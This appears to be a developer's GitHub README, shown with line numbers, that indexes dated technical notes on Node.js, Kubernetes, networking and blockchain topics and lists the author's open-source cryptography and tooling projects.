4 | 5 | ### Notes 6 | 7 | - [Dutch auction on Solana blockchain](https://github.com/fanatid/solana-dutch-auction) (2021-06-21) 8 | - [Measure Node.js bindings performance to github.com/w3f/schnorrkel](https://github.com/fanatid/schnorrkel-node-perf) (2021-02-20) 9 | - [Parse bitcoin blocks with C++, Node.js and Rust](https://github.com/fanatid/rust-bitcoin-blocks) (2020-03-30) 10 | - [The costs of npm-scripts](https://github.com/fanatid/notes/tree/master/2020-01-12-cost-of-npm-scripts) (2020-01-12) 11 | - [GitHub Actions for prebuilding Node.js Addons](https://github.com/fanatid/notes/tree/master/2020-01-02-github-actions-for-prebuildify) (2020-01-02) 12 | - [JavaScript, sometimes, is not your friend](https://github.com/fanatid/notes/tree/master/2019-12-18-llnode-elliptic) (2019-12-18) 13 | - [Why you should not leave promises in pending state in Node.js](https://github.com/fanatid/notes/tree/master/2019-09-27-node-promise-leaking) (2019-09-27) 14 | - [Module wrapper in Node.js](https://github.com/fanatid/notes/tree/master/2019-09-23-node-module-wrapper) (2019-09-23) 15 | - [Node.js: callback when object Garbage Collected](https://github.com/fanatid/notes/tree/master/2019-09-21-node-object-gc-callback) (2019-09-21) 16 | - [perf_hooks in Node.js](https://github.com/fanatid/notes/tree/master/2019-09-12-node-perf-hooks) (2019-09-12) 17 | - [global.gc in Node.js](https://github.com/fanatid/notes/tree/master/2019-09-09-node-global-gc) (2019-09-09) 18 | - [Package dependents from npmjs.com](https://github.com/fanatid/notes/tree/master/2019-09-01-npm-package-dependents) (2019-09-01) 19 | - [Virtual Machines with libvirt](https://github.com/fanatid/notes/tree/master/2019-08-31-libvirt-usage) (2019-08-31) 20 | - [uvthreads sync vs async in Node.js](https://github.com/fanatid/notes/tree/master/2019-08-30-node-uvthreads-sync-async) (2019-08-30) 21 | - [systemd instead pm2?](https://github.com/fanatid/notes/tree/master/2019-08-23-systemd-instead-pm2) (2019-08-23) 22 | - [DNS in Node.js](https://github.com/fanatid/notes/tree/master/2019-08-22-nodejs-dns) (2019-08-22) 23 | - [CoreDNS tune for external domains in Kubernetes](https://github.com/fanatid/notes/tree/master/2019-08-20-k8s-coredns-tune-for-external-domains) (2019-08-20) 24 | - [Kubernetes setup with kubeadm](https://github.com/fanatid/notes/tree/master/2019-08-19-kubernetes-setup-with-kubeadm) (2019-08-19) 25 | - [Virtual Server with keepalived](https://github.com/fanatid/notes/tree/master/2019-08-18-virtual-server-with-keepalived) (2019-08-18) 26 | - [Load balancing with iptables and IPVS](https://github.com/fanatid/notes/tree/master/2019-08-18-loadbalancer-iptables-ipvs) (2019-08-18) 27 | - [Internal failover IP in Hetzner Cloud with keepalived](https://github.com/fanatid/notes/tree/master/2019-08-06-hetzner-cloud-internal-failover-ip) (2019-08-06) 28 | - [Possible DoS of Insight](https://github.com/fanatid/notes/tree/master/2019-08-04-dos-insight-api) (2019-08-04) 29 | - [Own DNS in VPN](https://github.com/fanatid/notes/tree/master/2019-08-02-vpn-own-dns) (2019-08-02) 30 | - [WireGuard setup guide](https://github.com/fanatid/notes/tree/master/2019-07-28-wireguard-setup-guide) (2019-07-28) 31 | 32 | ### Projects 33 | 34 | - [cryptocoinjs/keccak](https://github.com/cryptocoinjs/keccak) — [Node.js](https://nodejs.org/) bindings to [Keccak sponge function family](https://keccak.team/index.html) 35 | - [cryptocoinjs/secp256k1-node](https://github.com/cryptocoinjs/secp256k1-node) — [Node.js](https://nodejs.org/) bindings to
[bitcoin-core/secp256k1](https://github.com/bitcoin-core/secp256k1) 36 | - [indutny/bn.js](https://github.com/indutny/bn.js) — BigNum in pure JavaScript (trying to resolve issues and maintain it) 37 | - [fanatid/rsyesql](https://github.com/fanatid/rsyesql) — Rust port of [yesql](https://github.com/krisajenkins/yesql), parses SQL stored in raw files for later usage 38 | - [fanatid/jsyesql](https://github.com/fanatid/jsyesql) — JS port of [yesql](https://github.com/krisajenkins/yesql), parses SQL stored in raw files for later usage 39 | - [fanatid/make-concurrent](https://github.com/fanatid/make-concurrent) — exclusive or shared access to some resource in JS 40 | - [fanatid/yarn-lock-dedupe](https://github.com/fanatid/yarn-lock-dedupe) — removes old dependencies from a yarn.lock file 41 | - [fanatid/hetzner-robot-mgmt](https://github.com/fanatid/hetzner-robot-mgmt) — experimental tool for state management of dedicated servers on [Hetzner](https://www.hetzner.com/) 42 | 43 | ### Other 44 | 45 | - [3rd party bookmarked notes](./3rd-party-bookmarked-notes.md) 46 | --------------------------------------------------------------------------------